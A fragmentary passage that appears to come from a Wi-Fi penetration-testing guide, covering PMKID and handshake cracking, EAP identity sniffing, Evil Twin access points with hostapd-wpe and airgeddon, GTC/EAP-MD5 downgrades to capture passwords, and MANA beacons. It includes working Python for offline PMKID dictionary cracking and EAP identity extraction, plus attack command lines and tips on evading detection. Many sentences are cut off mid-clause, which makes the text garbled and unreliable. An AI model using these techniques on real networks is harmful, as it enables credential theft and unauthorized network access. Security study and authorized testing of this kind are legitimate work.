Robust Security Network, which includes something called
PMK is the same one obtained from a full 4-way handshake, so this is all hashcat needs in order to crack the PSK and recover the passphrase. Description obtained from here.
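To see why a PMKID alone is enough, here is the computation hashcat performs for every candidate passphrase, as an added example (this is not code from the page or from hashcat/hcxtools). The PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) and the PMKID is the first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC), so a captured PMKID can be checked offline against a wordlist without any client traffic. The MAC addresses, SSID, passphrase and wordlist below are constructed sample values; the 22000-format line is built from them with the block's own helper. The parser accepts both the hashcat 22000 `WPA*01*...` line and the legacy 16800 `pmkid*ap*sta*ssid` line.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the HMAC
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_pmkid_line(line: str):
    """Parse a PMKID line in hashcat 22000 (WPA*01*...) or legacy 16800 (pmkid*ap*sta*ssid) format.

    Returns (pmkid, ap_mac, sta_mac, ssid) with the binary fields decoded from hex.
    """
    fields = line.strip().split("*")
    if fields[0] == "WPA":
        if fields[1] != "01":
            raise ValueError("not a PMKID line (type 02 is an EAPOL/4-way handshake line)")
        pmkid_hex, ap_hex, sta_hex, ssid_hex = fields[2:6]
    else:
        pmkid_hex, ap_hex, sta_hex, ssid_hex = fields[:4]
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex).decode())


def crack_pmkid(line: str, wordlist):
    """Return the first passphrase in wordlist whose PMKID matches the captured one, else None."""
    target, ap, sta, ssid = parse_pmkid_line(line)
    for candidate in wordlist:
        guess = pmkid_from_pmk(pmk_from_passphrase(candidate, ssid), ap, sta)
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def make_22000_pmkid_line(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    # Builds a 22000-format line from a known passphrase; used here only to construct sample input.
    p = pmkid_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac)
    return "WPA*01*%s*%s*%s*%s***" % (p.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


# Constructed sample capture: an AP 00:11:22:33:44:55, a client 66:77:88:99:aa:bb,
# SSID "TestNet" and the (hypothetical) passphrase "correct horse".
SAMPLE_AP = bytes.fromhex("001122334455")
SAMPLE_STA = bytes.fromhex("66778899aabb")
SAMPLE_LINE = make_22000_pmkid_line("correct horse", "TestNet", SAMPLE_AP, SAMPLE_STA)
SAMPLE_WORDLIST = ["password", "12345678", "correct horse", "letmein"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered passphrase:", crack_pmkid(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The cost of each guess is the 4096-iteration PBKDF2, which is why hashcat does this on GPUs; the point of the example is that nothing from the 4-way handshake (nonces, MIC, EAPOL frames) is needed when a PMKID is present in the first EAPOL message.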
hcxdumptool also captures handshakes (something like this will appear: MP:M1M2 RC:63258 EAPOLTIME:17091). You can convert the handshakes to hashcat/john format using
airodump-ng shows some handshake information, this means that the handshake was captured and you can stop listening:
airodump-ng, something like this:
airodump-ng inside a channel and
wireshark on the same interface) and filter the packets by
eapol. Inside the "Response, Identity" packet, the username of the client will appear (this outer identity travels in clear; with PEAP/TTLS the inner identity is sent only inside the TLS tunnel).
In this example, all users will share the pseudo-user-name “anonymous”. The first hop RADIUS server is an EAP-PEAP or EAP-TTLS server which drives the server end of the PEAP or TTLS protocol. The inner (protected) authentication type will then be either handled locally or proxied to a remote (home) RADIUS server.
In this example, users belonging to different realms hide their own identity but indicate which realm they belong to so that the first hop RADIUS server may proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms which will act as the PEAP or TTLS server. The first hop server acts purely as a RADIUS relay node. Alternatively, the first hop server may act as the EAP-PEAP or EAP-TTLS server and either process the protected authentication method or proxy it to another server. This option may be used to configure different policies for different realms.
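The following is an added example (not code from the page, Wireshark or FreeRADIUS) that does by hand what the `eapol` filter plus the "Response, Identity" packet shows: it walks EAPOL frames, keeps only EAP Response/Identity packets, and splits each identity into user and realm as in the RADIUS proxying scenario above, flagging the anonymous outer identities that only reveal the realm. It assumes the 802.1X (EAPOL) payload has already been extracted from the 802.11 data frame, which is what Wireshark hands you; the frames below are constructed sample input built with the block's own helper.

```python
import struct

EAPOL_TYPE_EAP_PACKET = 0   # EAPOL type 0 carries an EAP packet; type 3 is EAPOL-Key
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_TYPE_IDENTITY = 1


def parse_eapol_identity(frame: bytes):
    """Return the identity from an EAPOL frame carrying an EAP Response/Identity, else None.

    Layout: EAPOL header (version, type, length) followed by the EAP packet
    (code, id, length, type, type-data).
    """
    if len(frame) < 4:
        return None
    _version, eapol_type, eapol_len = struct.unpack("!BBH", frame[:4])
    if eapol_type != EAPOL_TYPE_EAP_PACKET:
        return None
    eap = frame[4:4 + eapol_len]
    if len(eap) < 5:
        return None  # Success/Failure packets have no type byte and carry no identity
    code, _ident, eap_len, eap_type = struct.unpack("!BBHB", eap[:5])
    if code != EAP_CODE_RESPONSE or eap_type != EAP_TYPE_IDENTITY or eap_len > len(eap):
        return None
    return eap[5:eap_len].decode("utf-8", errors="replace")


def split_identity(identity: str):
    """Split an NAI 'user@realm' into (user, realm); realm is None when absent."""
    user, sep, realm = identity.rpartition("@")
    if not sep:
        return identity, None
    return user, realm


def extract_identities(frames):
    """Return [(user, realm, anonymous_outer_identity)] for every Response/Identity in frames."""
    found = []
    for frame in frames:
        identity = parse_eapol_identity(frame)
        if identity is None:
            continue
        user, realm = split_identity(identity)
        # An empty or 'anonymous' username before the realm is the PEAP/TTLS outer identity
        # pattern from the proxy example: only the realm leaks, the real user stays in the tunnel.
        found.append((user, realm, user in ("", "anonymous")))
    return found


def build_eap_frame(code: int, ident: int, eap_type: int, payload: bytes) -> bytes:
    # Builds an EAPOL v2 frame wrapping one EAP packet; used here only to construct sample input.
    eap = struct.pack("!BBHB", code, ident, 5 + len(payload), eap_type) + payload
    return struct.pack("!BBH", 2, EAPOL_TYPE_EAP_PACKET, len(eap)) + eap


# Constructed sample capture (hypothetical realms and users):
SAMPLE_FRAMES = [
    build_eap_frame(EAP_CODE_REQUEST, 1, EAP_TYPE_IDENTITY, b""),            # AP asks for identity
    build_eap_frame(EAP_CODE_RESPONSE, 1, EAP_TYPE_IDENTITY, b"bob@corp.example"),
    bytes([2, 3, 0, 0]),                                                       # EAPOL-Key, ignored
    build_eap_frame(EAP_CODE_RESPONSE, 2, EAP_TYPE_IDENTITY, b"anonymous@partner.example"),
    build_eap_frame(EAP_CODE_RESPONSE, 3, EAP_TYPE_IDENTITY, b"@guest.example"),
    build_eap_frame(EAP_CODE_RESPONSE, 4, EAP_TYPE_IDENTITY, b"alice"),
]

if __name__ == "__main__":
    for user, realm, anon in extract_identities(SAMPLE_FRAMES):
        print("user=%r realm=%r anonymous_outer=%s" % (user, realm, anon))
```

Identities whose username is empty or "anonymous" are exactly the cases where the first-hop server only learns the realm and must proxy or terminate the tunnel itself; a plain username with no realm (like `alice` above) is what you get from supplicants that leak the real account name in the outer identity.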
ifconfig -a: check that the wlan interface to create the AP and the interface connected to the Internet are present.
Options: 5,6,7,8,9 (inside Evil Twin attack menu).
hostapd-wpe needs a configuration file to work. To automate the generation of these configurations you can use https://github.com/WJDigby/apd_launchpad (download the python file into /etc/hostapd-wpe/)
--negotiate gtc-downgrade to use the highly efficient GTC downgrade implementation (plaintext passwords)
--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (if you offer the same auth methods in the same order as the organisation, the attack will be much more difficult to detect).
Airgeddon can use previously generated certificates to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to capture the username and the EAP-MD5 challenge/response (an MD5 hash derived from the password). Later, the attacker can try to crack the password offline.
Airgeddon offers you the possibility of a continuous Evil Twin attack (noisy) or only creating the Evil Twin until someone connects (smooth).
#dh_file=/etc/hostapd-wpe/certs/dh) This will make
hostapd-wpe exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the server's private key. This only works while the client negotiates an RSA key-exchange cipher suite (with (EC)DHE suites the server key alone is not enough); once the TLS tunnel is decrypted, the inner authentication (for example MSCHAPv2 or PAP) is visible.
hostapd-wpe with that modified configuration as usual. Also, start
wireshark on the interface which is performing the Evil Twin attack.
Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...
--loud to create a Loud MANA + Known beacons attack):
airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0